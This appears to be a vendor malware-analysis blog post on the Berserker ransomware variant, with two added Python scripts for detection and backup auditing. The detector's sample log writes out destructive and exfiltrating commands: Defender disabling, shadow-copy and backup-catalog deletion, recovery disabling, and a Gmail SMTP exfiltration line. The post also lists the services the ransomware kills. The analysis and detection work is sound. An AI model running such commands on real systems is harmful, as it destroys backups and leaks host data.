In this Malware Analysis Spotlight, we analyze the Berserker variant of Hentai Oniichan Ransomware.
We’ve observed at least two different variants of Hentai Oniichan Ransomware in the wild, King Engine and Berserker. What we found interesting in our analysis of the Berserker variant is its attempt to make recovery difficult by deleting backup files, which is uncommon for traditional ransomware.
View the VMRay Analyzer Report for Hentai Oniichan Ransomware (Berserker Variant)
As a first step, Berserker injects code into a newly created process of the sample.
Initially, Berserker starts enumerating running processes in an attempt to terminate all processes that match its internal list (Figure 1).
After it finishes with process enumeration, Berserker tries to disable services responsible for backups (see Appendix for a complete list), monitoring, or anything else that could prevent it from encrypting files (Figure 2).
Berserker executes multiple PowerShell commands during its execution. To make sure this is possible, it tries to adjust certain settings and preferences (Figure 3). Following that, it also adjusts preferences for Windows Defender, such as disabling real-time monitoring and behavior monitoring.
The ransomware transmits the user name, computer name, and client key to an external server by sending an email. It uses PowerShell to construct the message and send it via Gmail’s SMTP server; the script contains the login credentials in plain text (Figure 4.1 & 4.2).
Berserker makes recovery more difficult by deleting backup files. Ransomware usually targets the recovery features provided by Microsoft Windows: it disables the recovery mode, deletes shadow copies, and deletes the backup catalog.
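The three behaviors described above (Windows Defender preference tampering, email exfiltration via Gmail's SMTP server with plain-text credentials, and disabling the Windows recovery features) are all visible in process-creation or PowerShell logs. The following detection logic is an added example written for this post, not VMRay's tooling and not code from the sample. It assumes a simplified `pid|image|command line` export format (adapt `parse_line` to your Sysmon Event ID 1 or 4688 data), and the log lines it runs over are constructed; the post does not show Berserker's exact command lines, so the rules match the Windows built-ins commonly used for each of the actions the post names.

```python
"""Flag the defense-evasion and exfiltration commands described in the post.

Added example (not VMRay's code). Log lines are constructed samples in an
assumed "pid|image|command line" format.
"""
import re
from dataclasses import dataclass

# Constructed sample: one benign line plus the categories the post describes.
SAMPLE_LOG = r"""4120|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true"
4132|C:\Windows\System32\vssadmin.exe|vssadmin delete shadows /all /quiet
4140|C:\Windows\System32\wbadmin.exe|wbadmin delete catalog -quiet
4148|C:\Windows\System32\bcdedit.exe|bcdedit /set {default} recoveryenabled No
4151|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -Command "$p = ConvertTo-SecureString 'REDACTED' -AsPlainText -Force; Send-MailMessage -SmtpServer smtp.gmail.com -UseSsl -Credential $cred -Subject $env:COMPUTERNAME"
4160|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\victim\notes.txt
"""

# Each rule is one behavior category; matching is case-insensitive because
# PowerShell and the Windows CLI tools are.
RULES = {
    "defender_tampering": re.compile(r"Set-MpPreference\b.*-Disable\w+", re.I),
    "shadow_copy_deletion": re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows", re.I),
    "backup_catalog_deletion": re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\s+catalog", re.I),
    "recovery_disabled": re.compile(r"\bbcdedit(\.exe)?\b.*recoveryenabled\s+no", re.I),
    "smtp_exfil_gmail": re.compile(
        r"Send-MailMessage\b.*smtp\.gmail\.com|smtp\.gmail\.com.*Send-MailMessage", re.I
    ),
    "plaintext_credential": re.compile(r"ConvertTo-SecureString\b.*-AsPlainText", re.I),
}


@dataclass
class Hit:
    pid: int
    image: str
    rules: list


def parse_line(line):
    """Split 'pid|image|command line' (assumed export format); None if malformed."""
    parts = line.split("|", 2)
    if len(parts) != 3 or not parts[0].isdigit():
        return None
    return int(parts[0]), parts[1], parts[2]


def classify(cmdline):
    """Return the names of all rules the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def analyze(log_text, min_categories=2):
    """Collect per-process hits and raise a host-level verdict.

    A single category (e.g. an admin deleting shadow copies) is noisy on its own;
    several distinct categories on one host in one log window is the
    ransomware pattern the post describes.
    """
    hits = []
    for raw in log_text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        pid, image, cmd = parsed
        rules = classify(cmd)
        if rules:
            hits.append(Hit(pid, image, rules))
    categories = sorted({r for h in hits for r in h.rules})
    return {
        "hits": hits,
        "categories": categories,
        "suspicious": len(categories) >= min_categories,
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for hit in result["hits"]:
        print(f"pid {hit.pid}: {', '.join(hit.rules)}")
    print("suspicious host:", result["suspicious"])
```

The correlation threshold is the important design choice: each rule alone will fire on legitimate administration, but the combination of Defender tampering, recovery-feature removal and an outbound mail script from the same host within a short window is what distinguishes the pre-encryption phase described here.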
While most ransomware stops at this point, Berserker goes the extra length by attempting to delete potential backup and disk image files. It searches for files with the extensions .vhd, .bac, .bak, .wbcat, .bkf, .set, .win, .dsk, and for files within directories called “Backup” or “backup” in the root directory of the filesystem (Figure 5). Typically, ransomware encrypts backups and doesn’t remove them, except for Shadow Copies. By deleting the backups instead of encrypting them, Berserker is potentially faster, but it carries the risk of destroying something the attackers can’t restore. In the case of virtual disk files used as additional data storage rather than for backups, the data is lost.
Recently, we have seen another approach used by RegretLocker which also targets virtual disk image files. Instead of deleting them, the RegretLocker ransomware mounts the image files and encrypts the data inside.
| Cyber Security Side-Note |
|---|
| Since ransomware targets files used for backups, it is advisable not to host those files on the same system that is being backed up. Ideally, the storage is only temporarily accessible and further protected so that ransomware cannot access it with ease. |
Berserker is written in C++ and is statically compiled against the library Crypto++.
For the encryption, Berserker iterates over the whole hard drive using depth-first search. It uses block-lists as a filtering mechanism: if a folder name or file extension is on its internal block-lists (see Appendix for a complete list), the file or directory is skipped. If the file is not on the list, it is encrypted later on and gets the extension .HOR.
The ransomware also doesn’t forget to deliver its ransom note. It drops two types of notes: the first is placed on the desktop and warns the user not to kill the running process (Figure 6).
The second ransom note is used as a replacement for the desktop wallpaper, where the actual ransom demand and contact information are written (Figure 7).
In contrast to most ransomware, Berserker targets additional files and directories to make recovery more complicated. To do so, it heavily relies on PowerShell and cmd. For example, the Windows Defender mitigation, the recovery feature tampering, and the email transmission are all handled using PowerShell.
Furthermore, we found several log messages referenced in the code, and during dynamic analysis the sample creates empty log files. This could indicate that the malware is still under development.
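A defender can use the two file-system facts above, the backup artifacts Berserker deletes (the listed extensions plus root-level “Backup”/“backup” directories) and the .HOR extension it appends after encryption, to audit a host before an incident and to triage it afterwards. The following audit script is an added example, not VMRay's tooling and not code from the sample. It walks a tree depth-first the way the post describes, reports which files a Berserker-style deletion would hit, and separately counts .HOR files as an indicator that encryption already ran. The directory tree it runs over is constructed in a temporary directory; the extension match is case-insensitive, which is an assumption chosen to over-report rather than replicate the malware's exact comparison, and the `.bak` entry on the ignored-extensions list is intentionally not consulted here because the post says such files are deleted, not encrypted.

```python
"""Audit a directory tree for the backup artifacts Berserker deletes and for
.HOR files left behind by its encryption. Added example (not VMRay's code);
the sample tree is constructed, not taken from the analyzed sample.
"""
import os
import tempfile
from pathlib import Path

# Extensions the post says Berserker deletes outright.
TARGETED_EXTENSIONS = {".vhd", ".bac", ".bak", ".wbcat", ".bkf", ".set", ".win", ".dsk"}
# Directory names searched in the root of the filesystem (post: "Backup" or "backup").
BACKUP_DIR_NAMES = {"Backup", "backup"}
# Extension appended to encrypted files.
ENCRYPTED_EXTENSION = ".hor"  # compared case-insensitively (assumption)


def audit_tree(root):
    """Return {'deletable': [...], 'encrypted': [...]} with paths relative to root.

    os.walk is a depth-first, top-down traversal, matching the post's
    description of how the ransomware iterates over the drive.
    """
    root = Path(root)
    deletable, encrypted = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        current = Path(dirpath)
        rel_parts = current.relative_to(root).parts
        # Only a Backup/backup directory directly under the root counts,
        # exactly as the post describes; deeper ones are not matched here.
        in_root_backup_dir = len(rel_parts) >= 1 and rel_parts[0] in BACKUP_DIR_NAMES
        for name in filenames:
            path = current / name
            rel = path.relative_to(root).as_posix()
            suffix = path.suffix.lower()
            if suffix == ENCRYPTED_EXTENSION:
                encrypted.append(rel)
            elif suffix in TARGETED_EXTENSIONS or in_root_backup_dir:
                deletable.append(rel)
    return {"deletable": sorted(deletable), "encrypted": sorted(encrypted)}


def build_sample_tree(base):
    """Create a constructed tree covering each rule plus two negatives."""
    files = [
        "Backup/weekly.wbcat",        # targeted extension inside a root backup dir
        "Backup/readme.txt",          # hit only because of the root backup dir
        "data/vm1.vhd",               # virtual disk used as storage: deleted, data lost
        "docs/report.docx",           # untouched by either rule
        "docs/report.docx.HOR",       # already encrypted
        "nested/backup/notes.txt",    # backup dir not at the root: not matched
        "nested/backup/old.bak",      # matched by extension regardless of location
    ]
    for rel in files:
        path = Path(base) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text("constructed sample content\n")
    return base


def demo():
    """Build the sample tree in a temp dir and audit it."""
    base = tempfile.mkdtemp(prefix="berserker-audit-")
    build_sample_tree(base)
    return audit_tree(base)


if __name__ == "__main__":
    result = demo()
    print("files a Berserker-style deletion would remove:")
    for rel in result["deletable"]:
        print("  ", rel)
    print("files already carrying the .HOR extension:")
    for rel in result["encrypted"]:
        print("  ", rel)
```

Run against a real volume root (for example `audit_tree("D:\\")`), a non-empty `deletable` list is the inventory the side-note warns about: backups or virtual disks that live on the same host they protect, which is exactly what this variant removes instead of encrypting.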
With VMRay’s unique dynamic analysis technology and the intelligent monitoring system at the hypervisor layer, malware analysts can quickly and reliably reconstruct the big picture of the malware’s behavior regardless of the complexity of the threat or its behavior.
Sample
4444458bf47925c82431843fd147aabbfbee71ca849fc711cb69b0cea01f474
List of Disabled Services
Acronis VSS Provider AcronisAgent AcrSch2Svc Antivirus ARSM AVP BackupExecAgentAccelerator BackupExecAgentBrowser BackupExecDeviceMediaService BackupExecJobEngine BackupExecManagementService BackupExecRPCService BackupExecVSSProvider bedbg ccEvtMgr ccSetMgr Culserver dbeng8 dbsrv12 DCAgent DefWatch EhttpSrv ekrn Enterprise Client Service EPSecurityService EPUpdateService EraserSvc11710 EsgShKernel ESHASRV FA_Scheduler IISAdmin IMAP4Svc KAVFSGT kavfsslp klnagent macmnsvc masvc MBAMService MBEndpointAgent McAfeeEngineService McAfeeFrameworkMcAfeeFramework McShield McTaskManager mfefire mfemms mfevtp MMS mozyprobackup MsDtsServer100 MsDtsServer110 MSExchangeES MSExchangeIS MSExchangeMGMT MSExchangeMTA MSExchangeSA MSExchangeSRS msftesql$PROD msmdsrv MSOLAP$SQL_2008 MSOLAP$SYSTEM_BGC MSOLAP$TPSAMA MSSQL$BKUPEXEC MSSQL$ECWDB2 MSSQL$PRACTICEMGT MSSQL$PRACTTICEBGC MSSQL$PROD MSSQL$PROFXENGAGEMENT MSSQL$SBSMONITORING MSSQL$SHAREPOINT MSSQL$SOPHOS MSSQL$SQL_2008 MSSQL$SQLEXPRESS MSSQL$SYSTEM_BGC MSSQL$TPSAMA MSSQL$VEEAMSQL2008R2 MSSQL$VEEAMSQL2012 MSSQLFDLauncher$PROFXENGAGEMENT MSSQLFDLauncher$SBSMONITORING MSSQLFDLauncher$SHAREPOINT MSSQLFDLauncher$SQL_2008 MSSQLFDLauncher$SYSTEM_BGC MSSQLFDLauncher$TPSAMA MSSQLSERVER MSSQLServerADHelper100 MSSQLServerOLAPService MySQL57 MySQL80 NetMsmqActivator ntrtscan OracleClientCache80 PDVFSService POP3Svc QBCFMonitorService QBIDPService QuickBoooks.FCS ReportServer$SQL_2008 ReportServer$SYSTEM_BGC ReportServer$TPSAMA RESvc RTVscan SAVAdminService SavRoam SAVService SepMasterService ShMonitor Smcinst SmcService SMTPSvc SNAC SntpService Sophos Agent Sophos AutoUpdate Service Sophos Clean Service Sophos Device Control Service Sophos File Scanner Service Sophos Health Service Sophos MCS Agent Sophos MCS Client Sophos Message Router Sophos Safestore Service Sophos System Protection Service Sophos Web Control Service sophossps SQL Backups sqladhlp SQLADHLP sqlagent SQLAgent$BKUPEXEC SQLAgent$CITRIX_METAFRAME SQLAgent$CXDB SQLAgent$ECWDB2 SQLAgent$PRACTTICEBGC SQLAgent$PRACTTICEMGT SQLAgent$PROD SQLAgent$PROFXENGAGEMENT SQLAgent$SBSMONITORING SQLAgent$SHAREPOINT SQLAgent$SOPHOS SQLAgent$SQL_2008 SQLAgent$SQLEXPRESS SQLAgent$SYSTEM_BGC SQLAgent$TPSAMA SQLAgent$VEEAMSQL2008R2 SQLAgent$VEEAMSQL2012 sqlbrowser SQLBrowser SQLsafe Backup Service SQLsafe Filter Service SQLSafeOLRService sqlserv SQLSERVERAGENT SQLTELEMETRY$ECWDB2 sqlwriter SQLWriter svcGenericHost swi_filter swi_service swi_update_64 Symantec System Recovery TmCCSF tmlisten tomcat6 TrueKeyScheduler TrueKeyServiceHelper UI0Detect Veeam Backup Catalog Data Service VeeamBackupSvc VeeamBrokerSvc VeeamCatalogSvc VeeamCloudSvc VeeamDeploymentService VeeamDeploySvc VeeamEnterpriseManagerSvc VeeamHvIntegrationSvc VeeamMountSvc VeeamNFSSvc VeeamRESTSvc VeeamTransportSvc vmware-converter vmware-usbarbitator64 W3Svc wrapper WRSVC
List of Ignored Extensions
.bak .bin .c .cpp .ps1 .hpp .cmd .com .dat .DAT .db .dll .exe .h .inf .ini .ink .js .lib .lnk .sys .vbs .ws